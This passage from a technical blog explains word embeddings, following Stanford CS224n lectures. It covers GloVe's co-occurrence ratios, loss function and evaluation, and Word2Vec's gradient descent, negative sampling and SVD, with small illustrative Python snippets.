“solid” co-occurs with the word “ice” often, while the word “gas”
doesn’t occur with the word “ice” as many times. But the problem is that
the word “water” will also occur a lot with “ice”, while a random word
like “fashion” doesn’t occur with the word “ice” many times. In
contrast, if we look at words co-occurring with the word “steam”,
“solid” won’t occur with “steam” many times, but “gas” will. The word
“water” will again co-occur often, and the occurrence of “fashion” will
be small. So to determine the meaning component of traversing from gas
to solid, it would be useful to look at the ratio of these co-occurrence
probabilities.</p>
<p>The ratio gives a spectrum from large to small between solid and
gas, whereas for “water” and a random word it basically cancels out and
gives a value of about 1. The numbers in the figure below are
illustrative.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_meaning_components.png"/></p>
<p>In an actual large corpus, the following are actual co-occurrence
probabilities.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_cooccurence_probabilities.png"/></p>
<p>As noted, the ratio of co-occurrence probabilities cancels out for
“water”, where both probabilities are high, and for “fashion”, where
both are low, so both ratios are around 1. Whereas the ratio of
probability of co-occurrence of solid with ice or steam is about 10. And
for gas it’s about a 10th.</p>
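<p>The ratio idea can be sketched with a toy example. The counts and
totals below are hypothetical, chosen only so that the ratios come out
near the values described above; they are not the corpus statistics from
the figure.</p>

```python
# Hypothetical co-occurrence counts: counts[word][context word]
counts = {
    "ice":   {"solid": 200, "gas": 80,  "water": 3000, "fashion": 20},
    "steam": {"solid": 20,  "gas": 800, "water": 2500, "fashion": 20},
}
# Hypothetical total number of context words seen around each word
totals = {"ice": 1_000_000, "steam": 1_000_000}


def cooccurrence_probability(word, context):
    """P(context | word), estimated from the counts."""
    return counts[word][context] / totals[word]


def probability_ratio(context, word_a="ice", word_b="steam"):
    """P(context | word_a) / P(context | word_b)."""
    return (cooccurrence_probability(word_a, context)
            / cooccurrence_probability(word_b, context))


for context in ("solid", "gas", "water", "fashion"):
    print(context, round(probability_ratio(context), 2))
```

<p>Words tied to only one of the two states give ratios far from 1,
while words related to both or to neither give ratios near 1.</p>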
<h4 id="log-bi-linear-model">Log bi-linear model</h4>
<p><img src="/extras/images/nlp-glove-algorithm/log_bilinear.png"/></p>
<p>In order to capture these ratios of co-occurrence probabilities as
linear meaning components within the word vector space, so that we can
just add and subtract linear meaning components, we can use a
log-bilinear model, in which <strong>the dot product between two word
vectors attempts to approximate the log of the probability of
co-occurrence.</strong> This gives the property that the dot product of
a word vector with the difference between two other vectors corresponds
to the log of the probability ratio shown in the previous figure.</p>
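<p>Written out, with <em>w</em> denoting a word vector and
<em>P</em>(<em>i</em> | <em>j</em>) the probability that word
<em>i</em> co-occurs with word <em>j</em> (this notation is an
assumption and may differ slightly from the figure), the two statements
above read:</p>
<p><span class="math display">$$
w_i \cdot w_j = \log P(i \mid j)
$$</span></p>
<p><span class="math display">$$
w_x \cdot (w_a - w_b) = \log \frac{P(x \mid a)}{P(x \mid b)}
$$</span></p>
<p>The second line follows from the first by subtracting the relation
for <em>b</em> from the relation for <em>a</em>, since a difference of
logs is the log of the ratio.</p>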
<p><img src="/extras/images/nlp-glove-algorithm/glove_loss_fn.png"/></p>
<p>So the GloVe model attempts to unify the thinking between the
co-occurrence matrix models and the neural models by being in some ways
similar to a neural model, while it:</p>
<ol type="1">
<li>is calculated on top of a co-occurrence matrix count.</li>
<li>has an explicit loss function.</li>
</ol>
<p>The explicit loss function is the difference between the dot product
and the log of the co-occurrence count. To prevent very common words
from dominating, the effect of high word counts is capped using the
<em>f</em> function. This structure allows the optimization of the
<em>J</em> function directly on the co-occurrence count matrix,
providing fast training that scales to huge corpora.</p>
<h4 id="objective-function-for-the-glove-model-log-bilinear-means">Objective
function for the GloVe model / log-bilinear means</h4>
<p><strong>log-bilinear</strong> - the “bi” is indicative of the two
terms <em>wi</em> and <em>wj</em>, similar to an algebraic term
<em>ax</em>, which is linear in <em>x</em> when <em>a</em> is a
constant. The difference is squared to ensure that the term is always
non-negative and J is a minimization problem. There are two bias terms,
one for each word, which can move things up and down for the word in
general. So if in general probabilities are high for a certain word,
this bias term can model that specifically for that word.</p>
<h4 id="explanation-for-fxij">Explanation for f(Xij)</h4>
<p><em>f(Xij)</em> is provided to scale things depending on the
frequency of a word because we want to pay more attention to words that
are more common or word pairs that are more common. But there is a
potential issue when we have extremely common words like function words.
So the function <em>f(Xij)</em> typically pays attention to words that
co-occurred together up until a certain point. And then the curve just
goes flat, so it didn’t matter if it was even an extremely, extremely
common word.</p>
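<p>The pieces described above (dot product, two bias terms, squared
difference to the log count, and the capped weighting) can be put
together in a short sketch. This is an illustration, not the reference
implementation: the function and argument names are made up, and the
cap <code>x_max=100</code> and exponent <code>alpha=0.75</code> are the
values reported in the GloVe paper rather than anything stated in this
post.</p>

```python
import math


def weight(x, x_max=100.0, alpha=0.75):
    """Weighting f(x): grows with the count, then stays flat at 1 once x >= x_max."""
    return (x / x_max) ** alpha if x < x_max else 1.0


def glove_loss(cooccurrence, w, w_tilde, b, b_tilde):
    """Sum over non-zero counts of f(X_ij) * (w_i . w~_j + b_i + b~_j - log X_ij)^2."""
    total = 0.0
    for (i, j), x_ij in cooccurrence.items():
        if x_ij <= 0:
            continue  # log(0) is undefined; zero counts contribute nothing
        dot = sum(a * c for a, c in zip(w[i], w_tilde[j]))
        error = dot + b[i] + b_tilde[j] - math.log(x_ij)
        total += weight(x_ij) * error ** 2
    return total


# Toy usage with two words and 2-dimensional vectors (all values hypothetical)
cooccurrence = {(0, 1): 10.0, (1, 0): 200.0}
w = [[0.1, 0.2], [0.3, 0.4]]
w_tilde = [[0.5, 0.1], [0.2, 0.6]]
b = [0.0, 0.0]
b_tilde = [0.0, 0.0]
print(glove_loss(cooccurrence, w, w_tilde, b, b_tilde))
```

<p>Because the weight is capped at 1, a pair seen 200 times counts no
more than a pair seen 100 times, which is the flat part of the curve
described above.</p>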
<h3 id="results">Results</h3>
<p><img src="/extras/images/nlp-glove-algorithm/glove_frog_results.png"/></p>
<p>Nearest words to the word “frog” - We get “frogs”, “toad”, and then
we get some complicated words. But it turns out they are all frogs,
until we get down to lizards.</p>
<h3 id="evaluation-of-glove-algorithm">Evaluation of Glove
algorithm</h3>
<p>There are typically two ways of evaluation - Intrinsic and extrinsic.
In an intrinsic evaluation we evaluate directly on the specific or
intermediate subtasks that we’ve been working on. Intrinsic evaluations
are fast to compute and help understand the component we’ve been working
on.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_evaluate.png"/></p>
<p>An extrinsic evaluation utilizes a real task of interest, such
as web search or machine translation, and measures the performance on
that task. However, such evaluation takes longer due to
the extensiveness of the system involved. And sometimes it is difficult
to tell whether a result is due to the quality of the word vectors,
to some other component of the system, or to other components simply
interacting better with the previous version of the word vectors.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_intrinsic.png"/></p>
<p>For intrinsic evaluation of word vectors, we can provide models with
a big collection of word vector analogy problems, such as “man is to
woman as king is to blank?”. The model finds the word that is
closest, such as “queen”, and we produce an accuracy score of how often
the model answers correctly.</p>
<p>Note: Many times during such evaluation, the actual closest word is
really just “king”. So to prevent this issue, the three input words are
not allowed in the selection process, choosing only the nearest word
that isn’t one of the input words.</p>
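<p>The analogy lookup, including the rule that excludes the three input words, can be sketched as follows. The 2-dimensional vectors are made up for illustration (they are not GloVe vectors), and <code>analogy</code> and <code>cosine</code> are hypothetical helper names.</p>

```python
import numpy as np

# Hypothetical 2-d toy vectors: axis 0 = "royalty", axis 1 = "gender".
vectors = {
    "man": np.array([0.0, 1.0]),
    "woman": np.array([0.0, -1.0]),
    "king": np.array([1.0, 1.0]),
    "queen": np.array([1.0, -1.0]),
    "apple": np.array([-1.0, 0.1]),
}


def cosine(a, b):
    """Cosine similarity between two vectors."""
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))


def analogy(a, b, c, vectors):
    """Answer 'a is to b as c is to ?', skipping the three input words."""
    target = vectors[b] - vectors[a] + vectors[c]
    candidates = [w for w in vectors if w not in (a, b, c)]
    return max(candidates, key=lambda w: cosine(vectors[w], target))


print(analogy("man", "woman", "king", vectors))
```

<p>An accuracy score is then the fraction of analogy questions for which the returned word matches the expected answer.</p>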
<p><img src="/extras/images/nlp-glove-algorithm/glove_viz_1.png"/></p>
<p>The GloVe vector examples above exhibit a strong linear component
property, such as the male-female dimension. For example, taking the
vector difference between “man” and “woman” and adding it to “brother”,
the expectation is to get to “sister”, and likewise from “king” to
“queen”, which holds for many of these examples. But some examples may
not work: starting from “emperor”, the vector might get to “countess” or
“duchess” instead.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_viz_2.png"/></p>
<p>These two examples illustrate that company-to-CEO relations and
superlatives also move along roughly linear components.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_viz_3.png"/></p>
<h3 id="evaluation-metrics">Evaluation Metrics</h3>
<p>The word2vec authors built a data set of analogies to evaluate
different models on the accuracy of their analogies, including semantic
and syntactic analogies. Unscaled co-occurrence counts passed through an
SVD work terribly. With some scaling, an SVD of the scaled count matrix
works reasonably well; the SVD-L entry is of this kind and is similar to
the COALS model. Such models do a decent enough job without a neural
network.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_eval_results.png"/></p>
<p>The results also show how the word2vec and GloVe models performed. In
2014 the GloVe result was considered the best, although it might have
scored better partly because of better data.</p>
<h3 id="better-data">Better Data</h3>
<p><img src="/extras/images/nlp-glove-algorithm/glove_analogy_data.png"/></p>
<p>The above image illustrates the semantic, syntactic and overall
performance on word analogies of GloVe models trained on different
subsets of data. One big advantage was that the GloVe model was partly
trained on Wikipedia as well as other text, whereas the word2vec model
that was released was trained exclusively on Google News. For semantics,
news data is not as good as even one quarter of the amount of Wikipedia
data. On the right end, with Common Crawl web data of 42 billion words,
we get good scores again on the semantic side.</p>
<p>The graph on the right shows performance against the vector
dimension. 25-dimensional vectors score poorly, while 100-dimensional
vectors already work reasonably well. There are still significant gains
at 200 dimensions and smaller gains up to 300. 300-dimensional vectors
seem to be the sweet spot: the best known sets of word vectors,
including the released word2vec and GloVe vectors, are
300-dimensional.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_intrinsic_eval_2.png"/></p>
<h3 id="human-judgments-of-word-similarity">Human judgments of word
similarity</h3>
<p>Another intrinsic evaluation is to see how well these models match
human judgments of word similarity. Psychologists have collected human
judgments of word similarity for several decades: people are given pairs
of words like “professor” and “doctor” and asked for a similarity score,
measured as a continuous quantity between, say, 0 and 10.</p>
<p>The responses are then averaged over multiple human judgments as to
how similar different words are. For example, “tiger” and “cat” are
pretty similar. “Computer” and “internet” are pretty similar, while
“plane” and “car” are less similar. “Stock” and “CD” aren’t very similar
at all, but “stock” and “jaguar” are even less similar.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_correlation.png"/></p>
<p>In particular, we can measure a <strong>correlation
coefficient</strong> of whether the model and the humans give the same
ordering of similarity judgments. There are various data sets of word
similarities, and different models can be scored on how well they do on
them. Plain SVD works comparatively better here than it did for
analogies; it is not completely terrible because we no longer need the
linear property. Scaled SVD works a lot better, word2vec works a bit
better than that, and the GloVe model has a similar minor advantage.</p>
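<p>Since the comparison is about ordering, one plausible choice of coefficient is Spearman's rank correlation. The post does not name the coefficient, so this is an assumption. The sketch below uses made-up scores for five word pairs and assumes there are no tied values.</p>

```python
def ranks(values):
    """Rank positions (1 = smallest); assumes no tied values."""
    order = sorted(range(len(values)), key=lambda i: values[i])
    result = [0] * len(values)
    for rank, index in enumerate(order, start=1):
        result[index] = rank
    return result


def spearman(xs, ys):
    """Spearman rank correlation for two equal-length lists without ties."""
    n = len(xs)
    d_squared = sum((rx - ry) ** 2 for rx, ry in zip(ranks(xs), ranks(ys)))
    return 1 - 6 * d_squared / (n * (n * n - 1))


# Hypothetical scores for five word pairs (not taken from any real data set).
human_scores = [7.4, 7.6, 5.8, 1.3, 0.9]      # averaged human judgments, 0 to 10
model_scores = [0.62, 0.55, 0.40, 0.12, 0.05]  # e.g. cosine similarity of word vectors
print(spearman(human_scores, model_scores))
```

<p>A value of 1 means the model orders the pairs exactly as the humans do; here the top two pairs are swapped, so the score falls slightly below 1.</p>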
<h3 id="extrinisic-evaluation">Extrinsic Evaluation</h3>
<p>NER (named entity recognition) is an extrinsic task: identifying
mentions of a person’s name, an organization name like a company, or a
location. Having good word vectors helps perform named entity recognition
effectively. Starting with a model with discrete features, which uses
word identity as features, we can build a named entity model, and
adding word vectors provides a better representation of the meaning
of words. <img alt="Glove NER" src="/extras/images/nlp-glove-algorithm/glove_ner.png"/></p>
<blockquote>
<p><a href="https://arxiv.org/pdf/2203.13928.pdf">On the Intrinsic and
Extrinsic Fairness Evaluation Metrics for Contextualized Language
Representations</a> <em>by Yang Trista Cao et al.</em> is a good
reference on these different evaluation metrics and underlying
biases.</p>
</blockquote>
<h3 id="word-senses-and-word-sense-ambiguity">Word Senses and word sense
ambiguity</h3>
<p>The word “pike” has many different meanings:</p>
<ul>
<li>A sharp point or staff</li>
<li>A type of elongated fish</li>
<li>A railroad line or system</li>
<li>A type of road</li>
<li>The future (coming down the pike)</li>
<li>A type of body position (as in diving)</li>
<li>To kill or pierce with a pike</li>
<li>To make one’s way (pike along)</li>
<li>In Australian English, pike means to pull out from doing something:
I reckon he could have climbed that cliff, but he piked!</li>
</ul>
<h4 id="improving-word-representations-via-global-context-and-multiple-word-prototypes-huang-et-al.-2012">Improving
Word Representations Via Global Context And Multiple Word Prototypes
(Huang et al. 2012)</h4>
<p>The gut feeling is usually to have different vectors for each meaning
of the same word, as it seems counter-intuitive to have the same vector
for all the different meanings. In that view “pike”, and other words,
would have <strong>“word sense”</strong> vectors. This paper attempted
to improve the representation of words such as “pike”. The primary idea
was to cluster the word windows around each word and retrain with each
word assigned to one of multiple clusters (bank1, bank2, etc.). The
clusters of word tokens are then treated as if they were separate words,
and a word vector is learned for each. This does work, and we can learn
word vectors for different senses of a word. But this isn’t the way most
practice has gone since, primarily due to the increased complexity. It
also tends to be imperfect in its own way: we are trying to take all the
uses of the word “pike” and cut them up into a few distinct senses, but
the senses overlap and there is no clear distinction between them. It is
always unclear how to cut word meaning into different senses.</p>
<p>In practice, the single vector learned for a word is a superposition
of the word vectors for its different senses, where “superposition”
means no more or less than a weighted sum. So the vector that we learn
for “pike” will be a weighted average of the vectors that we would have
learned for the medieval weapon sense, plus the fish sense, plus the
road sense, plus whatever other senses there are, <strong>where
the weighting that’s given to these different sense vectors corresponds
to the frequencies of use of the different senses.</strong></p>
<p>Adding up several different vectors into an average does not lose
the real meanings of the word: it turns out that this average vector
tends to self-disambiguate in applications.</p>
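<p>The frequency-weighted sum can be illustrated with a few made-up numbers. The sense vectors and usage counts below are purely hypothetical and chosen so that the result is easy to read.</p>

```python
import numpy as np

# Hypothetical sense vectors and usage counts for "pike" (illustrative values only).
sense_vectors = {
    "weapon": np.array([1.0, 0.0, 0.0]),
    "fish": np.array([0.0, 1.0, 0.0]),
    "road": np.array([0.0, 0.0, 1.0]),
}
sense_counts = {"weapon": 20, "fish": 50, "road": 30}

total = sum(sense_counts.values())
# Weight each sense vector by its relative frequency of use, then add them up.
pike_vector = sum(
    (sense_counts[s] / total) * sense_vectors[s] for s in sense_vectors
)
print(pike_vector)  # the most frequent sense contributes the most
```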
<h3 id="references">References</h3>
<ol type="1">
<li><a href="https://www.youtube.com/watch?v=gqaHkPEZAew">Video</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/slides/cs224n-2022-lecture02-wordvecs2.pdf">Slides</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/readings/cs224n-2019-notes02-wordvecs2.pdf">Notes</a></li>
</ol>
<h3 id="suggested-readings">Suggested Readings</h3>
<ol type="1">
<li><a href="http://nlp.stanford.edu/pubs/glove.pdf">GloVe: Global
Vectors for Word Representation</a> (original GloVe paper)</li>
<li><a href="http://www.aclweb.org/anthology/Q15-1016">Improving
Distributional Similarity with Lessons Learned from Word
Embeddings</a></li>
<li><a href="http://www.aclweb.org/anthology/D15-1036">Evaluation
methods for unsupervised word embeddings</a></li>
</ol>
<h3 id="additional-readings">Additional Readings</h3>
<ol type="1">
<li><a href="http://aclweb.org/anthology/Q16-1028">A Latent Variable
Model Approach to PMI-based Word Embeddings</a></li>
<li><a href="https://transacl.org/ojs/index.php/tacl/article/viewFile/1346/320">Linear
Algebraic Structure of Word Senses, with Applications to
Polysemy</a></li>
<li><a href="https://papers.nips.cc/paper/7368-on-the-dimensionality-of-word-embedding.pdf">On
the Dimensionality of Word Embedding</a></li>
</ol>NLP Word2Vec Algorithm2022-03-20T00:00:00-07:002022-03-20T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-03-20:/posts/nlp-word2vec-algorithm.htmlA post detailing more about the Word2Vec algorithm, its variations and utilities<p>This blog post captures the inner workings of the Word2Vec Algorithm,
by roughly following the lecture patterns for the CS224n course from
Stanford.</p>
<h3 id="word2vec-algorithm">Word2vec algorithm</h3>
<p>Recalling the <em>Word2vec</em> algorithm from <a href="Introduction-to-nlp-and-word-vectors">Introduction-to-nlp-and-word-vectors</a>,
the only parameters of this model are the word vectors. Each word has a
context word vector and a center word vector. Taking the dot product of
a center vector and a context vector gives a score of how likely that
context word is to occur with the center word, and applying the
softmax transformation to the dot products converts the scores into
probabilities. The word2vec model is called a bag of words (BoW) model:
BoW models do not pay any attention to word order or position, i.e. to
the distance of the context words from the center word, while computing
the probability estimate.</p>
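<p>A minimal sketch of this probability computation, assuming a tiny made-up vocabulary and randomly initialized vectors (<code>V</code> for center vectors and <code>U</code> for context vectors are names chosen here for illustration):</p>

```python
import numpy as np

rng = np.random.default_rng(0)
vocab = ["the", "bank", "money", "river", "loan"]
dim = 4
# Two vectors per word: V holds center vectors, U holds context vectors.
V = rng.normal(scale=0.1, size=(len(vocab), dim))
U = rng.normal(scale=0.1, size=(len(vocab), dim))


def context_probabilities(center_index):
    """P(o | c) for every word o in the vocabulary, via softmax of u_o . v_c."""
    scores = U @ V[center_index]
    scores = scores - scores.max()  # subtract the max for numerical stability
    exp_scores = np.exp(scores)
    return exp_scores / exp_scores.sum()


probs = context_probabilities(vocab.index("bank"))
print(dict(zip(vocab, probs.round(3))))
```

<p>Note that the same distribution is used for every context position, which is exactly the bag of words property: position within the window plays no role.</p>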
<p><img src="/extras/images/nlp-word2vec-algorithm/word2vec_bow.png"/></p>
<h4 id="optimization-gradient-descent">Optimization: Gradient
Descent</h4>
<p>The next step is to determine the gradient of the loss function
with respect to the parameters. The algorithm starts with random word
vectors, initialized with small numbers near 0 in each
dimension. Gradient descent is an iterative algorithm that learns to
minimize the loss function <span class="math inline"><em>J</em>(<em>θ</em>)</span> by changing <span class="math inline"><em>θ</em></span>,
which represents the model weights. The idea of the algorithm is to
calculate the gradient of <span class="math inline"><em>J</em>(<em>θ</em>)</span> at the current
values of <span class="math inline"><em>θ</em></span>, and then make a small
step in the direction of the negative gradient to gradually move down
towards the minimum.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/gradient_descent.png"/></p>
<p>Simple gradient descent works the following way. The <strong>step
size</strong> parameter of the algorithm determines how long it takes and
whether it converges. If the <strong>step size</strong> is too small,
it takes a long time to minimize the function, while too large a step
can make the algorithm diverge or keep bouncing back and forth.
The algorithm steps a little bit in the negative direction of the
gradient using the step size, which gives new parameter values. Each
individual parameter gets updated only a little bit, by working out the
partial derivative of J with respect to that parameter and scaling it by
the learning rate (another name for the step size), where J is a
function of all windows in the corpus.</p>
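<p>The effect of the step size can be seen on a toy one-parameter objective. This is only a sketch: the quadratic objective and the function names are made up for illustration and have nothing to do with the word2vec loss itself.</p>

```python
def gradient_descent(grad, theta, step_size, steps):
    """Repeatedly step against the gradient: theta = theta - step_size * grad(theta)."""
    for _ in range(steps):
        theta = theta - step_size * grad(theta)
    return theta


def grad_J(theta):
    """Gradient of the toy objective J(theta) = (theta - 3) ** 2."""
    return 2 * (theta - 3)


small_step = gradient_descent(grad_J, theta=0.0, step_size=0.1, steps=50)
large_step = gradient_descent(grad_J, theta=0.0, step_size=1.1, steps=50)
print(small_step)  # ends up close to the minimum at theta = 3
print(large_step)  # overshoots on every step and moves further and further away
```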
<p><img src="/extras/images/nlp-word2vec-algorithm/update_step.png"/></p>
<p>Note that <span class="math inline"><em>J</em>(<em>θ</em>)</span> is a sum over every center word in the
entire corpus, and corpora often have billions of words,
which makes computing the gradient of <span class="math inline"><em>J</em>(<em>θ</em>)</span> expensive, as we have
to iterate over the entire corpus. So a single gradient update takes a
long time and optimization would be extremely slow.</p>
<h4 id="stochastic-gradient-descent">Stochastic Gradient Descent</h4>
<p>The alternative that avoids the above issue is stochastic
gradient descent. Rather than working out the gradient
based on the entire corpus, we take one center word, or a small batch of,
say, 32 center words, and work out an estimate of the gradient based on
them. That estimate of the gradient will be noisy because only a small
fraction of the corpus was used rather than the whole corpus.
Nevertheless, we can use that estimate of the gradient to update the
theta parameters in exactly the same way. So with a billion word corpus,
updating on each center word, we can make a billion updates to the
parameters as we pass through the corpus once, rather than making only
one more accurate update to the parameters using the entire corpus.
Overall, we can learn several orders of magnitude more quickly.</p>
<p>Neural nets have some quite counter-intuitive properties: even
though stochastic gradient descent is noisy and bounces around,
complex networks tend to learn better solutions with it than with plain,
slow gradient descent.</p>
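<p>A minimal sketch of minibatch stochastic gradient descent, using a toy problem in place of the word2vec loss: the “corpus” is just 10,000 random numbers and the single parameter <code>theta</code> should end up near their mean. The data, step size and number of passes are assumptions made for illustration; the batch size of 32 follows the text.</p>

```python
import numpy as np

rng = np.random.default_rng(0)
data = rng.normal(loc=5.0, scale=2.0, size=10_000)  # stand-in for "the corpus"

theta = 0.0
step_size = 0.05
batch_size = 32
for epoch in range(3):
    shuffled = rng.permutation(data)
    for start in range(0, len(shuffled), batch_size):
        batch = shuffled[start:start + batch_size]
        # Gradient of the mean of 0.5 * (theta - x) ** 2, estimated on this batch only.
        noisy_grad = np.mean(theta - batch)
        theta -= step_size * noisy_grad

print(theta, data.mean())  # theta hovers near the full-data mean despite noisy steps
```

<p>Each pass makes a few hundred cheap, noisy updates instead of a single exact one.</p>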
<p><img src="/extras/images/nlp-word2vec-algorithm/stochastic_grad_descent.png"/></p>
<h4 id="note-about-sgd">Note about SGD</h4>
<p>For example, when performing a stochastic gradient update for one
window, with one center word and a window size of 5, there would be at
most 11 distinct word types. So gradient information will be available
for those 11 words, but the other 100,000 words in our vocabulary will
have no gradient update information, making it a very sparse gradient
update. From a systems optimization perspective, we would
ideally update the parameters only for those few words, and there are
many efficient ways to achieve that.</p>
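<p>One simple way to picture such a sparse update is to index into the embedding matrix and touch only the rows for the words in the window. The word ids and gradients below are random stand-ins, since a real model would compute them; the embedding dimension of 8 is chosen only to keep the example small.</p>

```python
import numpy as np

vocab_size, dim = 100_000, 8
window_size = 5
rng = np.random.default_rng(0)
embeddings = rng.normal(scale=0.01, size=(vocab_size, dim))

# Hypothetical word ids for one window: 1 center word plus 5 words on each side.
window_ids = rng.choice(vocab_size, size=2 * window_size + 1, replace=False)
# Stand-in gradients for just those rows (a real model would compute these).
row_grads = rng.normal(size=(len(window_ids), dim))

before = embeddings.copy()
embeddings[window_ids] -= 0.05 * row_grads  # update only the rows in the window

changed_rows = np.flatnonzero(np.any(embeddings != before, axis=1))
print(len(changed_rows), "of", vocab_size, "rows changed")
```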
<blockquote>
<p>Note: word vectors have been presented as column vectors, which is
the usual convention in mathematical notation; however, in deep learning
packages, word vectors are actually represented as row vectors.</p>
</blockquote>
<p><img src="/extras/images/nlp-word2vec-algorithm/stochastic_grad_wordvec.png"/></p>
<h4 id="why-two-different-vectors-for-the-same-word">Why two different
vectors for the same word</h4>
<p>If we used the same vector for context and center, then whenever the
same word occurs in a window as both a center and a context word we
would get a dot product of a vector with itself, which makes the math
messier to work out.</p>
<h3 id="word2vec-model-functions">Word2Vec model functions</h3>
<p>word2vec comes in two model variants:</p>
<ol type="1">
<li>Skip-gram model, which predicts the context words given the center
word in a bag of words style model.</li>
<li>Continuous Bag of Words model, which predicts the center word from a
bag of context words.</li>
</ol>
<p>The original word2vec paper used the skip-gram model with
negative sampling, also called SGNS (skip-gram negative sampling),
instead of the naive softmax. The reason is that the softmax denominator
is expensive to compute: you have to iterate over every word in the
vocabulary and work out these dot products, and do so for every
window in the corpus. Negative sampling instead trains binary logistic
regression models to tell the true pair of center word and context
word apart from noise pairs, in which the true center word is paired
with words randomly sampled from the vocabulary. It updates only the
related weights, instead of updating all of the weights.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/skip_gram_negative_sampling.png"/></p>
<p>Instead of softmax, the dot product is passed through the logistic
function (sigmoid), which maps any real number to a probability in the
open interval between 0 and 1. So for a large dot product, the logistic
function returns a value close to 1.</p>
<p>On average, the dot product between the center word and a randomly
sampled word should be small, since that word most likely did not
actually occur in the context. The sigmoid function is symmetric, in the
sense that <span class="math inline"><em>σ</em>(−<em>x</em>) = 1 − <em>σ</em>(<em>x</em>)</span>, so to make the
probability of a noise pair small we can take the negative of the dot
product: the dot product of a random word and the center word should be
a small (negative) number, which is negated before being put through the
sigmoid.</p>
<p>The objective is to actually maximize the <span class="math inline"><em>J</em><sub><em>t</em></sub>(<em>θ</em>)</span>.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/skip_gram_negative_sampling_2.png"/></p>
<p>Equivalently, in line with the earlier discussion of minimizing the
negative log likelihood, we can minimize the negative log of the sigmoid
of the dot product for the true pair, plus the same kind of term for k
negative samples of random words. This loss is minimized by making the
dot product of the true pair large and the dot products of the k
negative samples small: their negation is then large, so each
contributes only a small positive amount to the loss after going through
the sigmoid and the log.</p>
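<p>Written as a loss to minimize, the description above corresponds to the negative log of the sigmoid for the true pair plus the negative log of the sigmoid of the negated dot product for each of the k noise words. The sketch below assumes that form; the vectors are made-up toy values and <code>negative_sampling_loss</code> is a hypothetical name.</p>

```python
import numpy as np


def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))


def negative_sampling_loss(v_center, u_context, u_negatives):
    """-log sigmoid(u_o . v_c) - sum over k of log sigmoid(-u_k . v_c)."""
    true_term = np.log(sigmoid(u_context @ v_center))
    noise_term = np.sum(np.log(sigmoid(-(u_negatives @ v_center))))
    return -(true_term + noise_term)


v_c = np.array([1.0, 0.5])
u_o = np.array([2.0, 1.0])                     # aligned with v_c: large dot product
u_neg = np.array([[-1.0, -0.5], [-2.0, 0.0]])  # k = 2 noise words, negative dot products
good_loss = negative_sampling_loss(v_c, u_o, u_neg)

# Flipping the signs (true pair has a negative dot product, noise pairs positive)
# gives a much larger loss.
bad_loss = negative_sampling_loss(v_c, -u_o, -u_neg)
print(good_loss, bad_loss)
```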
<h5 id="better-sampling-of-rare-words">Better sampling of rare
words</h5>
<p>While sampling, the authors of word2vec sample the words based on
their probability of occurrence using the unigram distribution of words,
which defines how often words actually occur in the corpus. For example,
if a particular word occurs 90 times in a billion word corpus, then
90 divided by a billion is the unigram probability of the word. The
probability is also raised to the <span class="math inline">3/4</span> power and
the distribution renormalized, which dampens the
difference between common and rare words so that less frequent
words are sampled more often, but still not nearly as often as under a
uniform distribution.</p>
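<p>The effect of the 3/4 power can be checked on a few made-up counts. The counts below are hypothetical; only the exponent comes from the text.</p>

```python
import numpy as np

# Hypothetical corpus counts for three words.
counts = {"the": 50_000_000, "model": 90_000, "pike": 90}
words = list(counts)
freq = np.array([counts[w] for w in words], dtype=float)

unigram = freq / freq.sum()
smoothed = freq ** 0.75
smoothed = smoothed / smoothed.sum()  # renormalize so the values sum to 1

for w, p, q in zip(words, unigram, smoothed):
    print(f"{w:6s} unigram={p:.2e} smoothed={q:.2e}")

rng = np.random.default_rng(0)
negatives = rng.choice(words, size=5, p=smoothed)  # draw 5 noise words
print(negatives)
```

<p>The rare word's probability goes up and the most common word's goes down, but the common word is still sampled far more often than the rare one.</p>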
<h4 id="problems-with-co-occurence-matrix">Problems with co-occurrence
matrix</h4>
<p><img src="/extras/images/nlp-word2vec-algorithm/cooccurence-matrix.png"/></p>
<ol type="1">
<li>Co-occurrence matrices are huge and very sparse. For example, with a
vocabulary of half a million words, each word has a half a million
dimensional vector.</li>
<li>Results tend to be noisier and less robust depending on what words
are available in the corpus.</li>
<li>So for better results we should work with low dimensional
vectors.</li>
<li>In practice the dimensionality of the vectors that are used is
normally somewhere between 25 and 1,000.</li>
</ol>
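<p>To make the object being discussed concrete, here is a small sketch that builds a window-based co-occurrence matrix from a tiny made-up corpus. The three sentences and the window of 1 are assumptions for illustration.</p>

```python
import numpy as np

corpus = [
    "i like deep learning".split(),
    "i like nlp".split(),
    "i enjoy flying".split(),
]
vocab = sorted({word for sentence in corpus for word in sentence})
index = {word: i for i, word in enumerate(vocab)}

window = 1  # count neighbours one position to the left and right
X = np.zeros((len(vocab), len(vocab)), dtype=int)
for sentence in corpus:
    for pos, word in enumerate(sentence):
        lo = max(0, pos - window)
        hi = min(len(sentence), pos + window + 1)
        for other in range(lo, hi):
            if other != pos:
                X[index[word], index[sentence[other]]] += 1

print(vocab)
print(X)
print("fraction of zero entries:", np.mean(X == 0))
```

<p>Each row is a word's count vector, with one dimension per vocabulary word; even in this tiny example most entries are zero.</p>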
<h4 id="singular-value-decomposition">Singular Value Decomposition</h4>
<p><img src="/extras/images/nlp-word2vec-algorithm/singular-value-decomposition.png"/></p>
<p>Singular value decomposition gives an optimal way, under a certain
definition of optimality, of producing a reduced dimensionality set of
matrices that maximally recovers the original matrix. The co-occurrence
count matrix can be decomposed into three matrices: a matrix U, a
diagonal matrix sigma, and a V transpose matrix. We can take advantage
of the fact that the singular values inside the diagonal sigma matrix
are ordered from largest down to smallest: by discarding some of the
smaller values, we can extract lower dimensional representations for our
words which still let us approximately recover the original
co-occurrence matrix. But it works poorly on raw counts, because the
method implicitly expects normally distributed errors, whereas we have
exceedingly common words like “a,” “the,” and “and” and a very large
number of rare words.</p>
